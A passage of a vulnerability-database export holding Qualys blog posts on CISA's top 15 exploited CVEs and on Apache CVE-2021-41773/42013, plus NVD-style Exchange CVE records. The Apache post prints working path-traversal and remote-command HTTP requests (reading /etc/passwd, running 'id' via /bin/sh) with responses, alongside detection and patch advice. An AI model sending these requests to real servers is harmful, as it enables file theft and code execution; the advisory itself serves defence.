Qualys VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities.\n\nUsing VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nView vulnerabilities be severity in Qualys VMDR\n\nQualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as they may propagate across multiple assets in your infrastructure.\n\nDashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited\n\nQualys Unified Dashboard\n\n#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company\u2019s internet-facing assets. To do so, apply the tag \u201cInternet Facing Assets\u201d in the Prioritization tab. You can add tags like "Cloud Environments", "Type: Servers", "Web Servers", and "VMDR-Web Servers" to increase your scope of assets.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nPrioritizing vulnerabilities for remediation in Qualys VMDR\n\n#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.\n\nTo view the patchable QIDs, enable the "Show only Patchable" toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.\n\nUsing Qualys Patch Management to apply patches\n\nQualys Patch Management also provides the ability to deploy custom patches. The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nViewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T12:19:24", "type": "qualysblog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-06T12:19:24", "id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T18:36:54", "description": "On October 4, 2021, Apache HTTP Server Project released Security advisory on a Path traversal and File disclosure vulnerability in Apache HTTP Server 2.4.49 and 2.4.50 tracked as CVE-2021-41773 and CVE-2021-42013. In the advisory, Apache also highlighted \u201cthe issue is known to be exploited in the wild\u201d and later it was identified that the vulnerability can be abused to perform remote code execution. For exploiting both the vulnerabilities Apache HTTP server must be running in non-default configuration.\n\nAs the vulnerabilities are configuration dependent, checking the version of Apache web server is not enough to identify vulnerable servers. With both the CVEs being actively exploited, [Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) has released **QID 150372, 150373, 150374** which sends specially crafted HTTP request to the target server to determine if it is exploitable. Once successfully detected, users can remediate the vulnerabilities by upgrading to Apache HTTP Sever 2.4.51 or greater.\n\n### About CVE-2021-41773\n\nAccording to **CVE-2021-41773**, Apache HTTP Server 2.4.49 is vulnerable to Path Traversal and Remote Code execution attacks.\n\n#### Path Traversal Analysis\n\nThe path traversal vulnerability was introduced due to the new code change added for path normalization i.e., for URL paths to remove unwanted or dangerous parts from the pathname, but it was inadequate to detect different techniques of encoding the path traversal characters "dot-dot-slash (../)"\n\nTo prevent path traversal attacks, the normalization function which is responsible to resolve URL-encoded values from the requested URI, resolved Unicode values one at a time. Hence when URL encoding the second dot as `%2e`, the logic fails to recognize `%2e` as dot thereby not decoding it, this converts the characters `../` to `.%2e/` and bypasses the check.\n\nAlong with Path traversal check bypass, for an Apache HTTP server to be vulnerable, the HTTP Server configuration should either contain the [directory directive](<https://httpd.apache.org/docs/2.4/mod/core.html#directory>) for entire server\u2019s filesystem as `Require all granted` or the directory directive should be completely missing from the configuration file.\n\n##### Vulnerable Configuration:\n \n \n <Directory />\n Require all granted\n </Directory>\n \n\nTherefore, bypassing the dot-dot check as `.%2e` and chaining it with misconfigured directory directive allows an attacker to read arbitrary files such as `passwd` from the vulnerable server file system.\n\n##### Exploitation: Path Traversal\n\nRequest:\n \n \n GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 08:13:02 GMT\n Server: Apache/2.4.49 (Unix)\n Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT\n ETag: \"39e-5cceec7356000\"\n Accept-Ranges: bytes\n Content-Length: 926\n Connection: close\n \n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\n gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n _apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\nPlease note that the default configuration of Apache HTTP server has the entire filesystem directory directive configured as `Require all denied` and hence is not vulnerable.\n\n#### Remote Code Execution Analysis\n\nWhile **CVE-2021-41773** was initially documented as Path traversal and File disclosure vulnerability additional research concluded that the vulnerability can be further exploited to conduct remote code execution when [mod_cgi](<https://httpd.apache.org/docs/current/mod/mod_cgi.html>) module is enabled on the Apache HTTP server, this allows an attacker to leverage the path traversal vulnerability and call any binary on the system using HTTP POST requests.\n\n##### Configuration to enable mod_cgi module:\n \n \n <IfModule !mpm_prefork_module>\n LoadModule cgid_module modules/mod_cgid.so\n </IfModule>\n \n\nBy default the `mod_cgi` module is disabled on Apache HTTP server by commenting the above line in the configuration file. Hence, when mod_cgi is enabled and \u201cRequire all granted\u201d config is applied to the filesystem directory directive then an attacker can remotely execute commands on the Apache server. \n\n##### Exploitation: Remote Code Execution\n\nRequest:\n \n \n POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0\n Accept: */*\n Content-Length: 7\n Content-Type: application/x-www-form-urlencoded\n Connection: close\n \n echo;id\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 09:58:23 GMT\n Server: Apache/2.4.49 (Unix)\n Connection: close\n Content-Length: 45\n \n uid=1(daemon) gid=1(daemon) groups=1(daemon)\n\nLooking at the HTTP POST request for RCE, we can understand `/bin/sh` is the system binary that executes the payload `echo;id` and print the output of `id` command in response.\n\n### About CVE-2021-42013\n\n**CVE-2021-42013** was introduced as the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient as it did not cover double URL encoding, therefore the vulnerable configurations remained the same, but payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.\n\nThe attack in 2.4.49 initially encoded the second dot (.) to `%2e` and the same was double URL encoded into `%%32%65` for version 2.4.50\n\n##### **Encoding Analysis**\n\nConversion: dot \u2192 `%2e` \u2192 `%%32%65`\n\n * 2 is encoded to %32\n * e is encoded to %65\n * And original `%` left as it is\n\nThus a `dot` is equivalent to `%%32%65` which eventually converts `../` in double URL encode format as `%%32%65%%32%65/`\n\n##### Exploitation: Path Traversal\n\nRequest:\n \n \n GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 10:16:51 GMT\n Server: Apache/2.4.50 (Unix)\n Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT\n ETag: \"39e-5cceec7356000\"\n Accept-Ranges: bytes\n Content-Length: 926\n Connection: close\n \n \n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\n gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n _apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n\n##### Exploitation: Remote Code Execution\n\nRequest:\n \n \n POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\n Host: 127.0.0.1:8080\n User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 7\n \n echo;id\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 10:42:40 GMT\n Server: Apache/2.4.50 (Unix)\n Connection: close\n Content-Length: 45\n \n uid=1(daemon) gid=1(daemon) groups=1(daemon)\n\n### Detecting the Vulnerabilities with Qualys WAS\n\nCustomers can detect these vulnerabilities with Qualys Web Application Scanning using the following QIDs:\n\n * 150372: Apache HTTP Server Path Traversal (CVE-2021-41773)\n * 150373: Apache HTTP Server Remote Code Execution (CVE-2021-41773)\n * 150374: Apache HTTP Server Multiple Vulnerabilities (CVE-2021-42013)\n\n\nQID 150372 \u2013 Apache HTTP Server Path Traversal (CVE-2021-41773)\n\n### Report\n\nOnce the vulnerability is successfully detected by Qualys WAS, users shall see similar kind of results for QID 150372 in the vulnerability scan report:\n\n\n\n### Solution\n\nOrganizations using Apache HTTP Server 2.4.49 or 2.4.50 are advised to upgrade to HTTP Server 2.5.51 or later version to remediate CVE-2021-41773 & CVE-2021-42013, more information can be referred at [Apache Security advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\nFor maintaining best security practices, Qualys also advises users to ensure the following:\n\n * `mod_cgi` module is disabled by default unless the business requires it.\n * filesystem directory directive to be updated with `Require all denied` as show below:\n \n \n <Directory />\n Require all denied\n </Directory>\n \n\n### Credits\n\n**Apache Security advisory:**\n\n<https://httpd.apache.org/security/vulnerabilities_24.html>\n\n**CVE Details:**\n\n<https://nvd.nist.gov/vuln/detail/CVE-2021-41773> \n<https://nvd.nist.gov/vuln/detail/CVE-2021-42013>\n\n**Credits for the vulnerability discovery go to:**\n\n * Ash Daulton along with the cPanel Security Team\n * Juan Escobar from Dreamlab Technologies\n * Fernando Mu\u00f1oz from NULL Life CTF Team\n * Shungo Kumasaka and Nattapon Jongcharoen\n\n**References:**\n\n * <https://twitter.com/ptswarm/status/1445376079548624899>\n * <https://twitter.com/hackerfantastic/status/1445529822071967745>\n * <https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>\n\n### Contributor\n\n**Jyoti Raval**, Lead Web Application Security Analyst, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T06:22:22", "type": "qualysblog", "title": "Apache HTTP Server Path Traversal & Remote Code Execution (CVE-2021-41773 & CVE-2021-42013)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-28T06:22:22", "id": "QUALYSBLOG:78A056D339E07378EFC349E5ACA8EC30", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-08-16T02:34:40", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:15:00", "type": "prion", "title": "CVE-2021-26412", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-09T17:41:00", "id": "PRION:CVE-2021-26412", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-26412", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T02:41:16", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-27065, CVE-2021-27078.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-03T00:15:00", "type": "prion", "title": "CVE-2021-26858", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-08T20:46:00", "id": "PRION:CVE-2021-26858", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-26858", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T02:49:03", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27078.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-03T00:15:00", "type": "prion", "title": "CVE-2021-27065", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-27065", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-27065", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T02:49:05", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:15:00", "type": "prion", "title": "CVE-2021-27078", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-08T19:34:00", "id": "PRION:CVE-2021-27078", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-27078", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T02:41:11", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:15:00", "type": "prion", "title": "CVE-2021-26855", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-26855", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-26855", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T02:41:10", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:15:00", "type": "prion", "title": "CVE-2021-26854", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-09T17:47:00", "id": "PRION:CVE-2021-26854", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-26854", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T02:41:11", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-03T00:15:00", "type": "prion", "title": "CVE-2021-26857", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 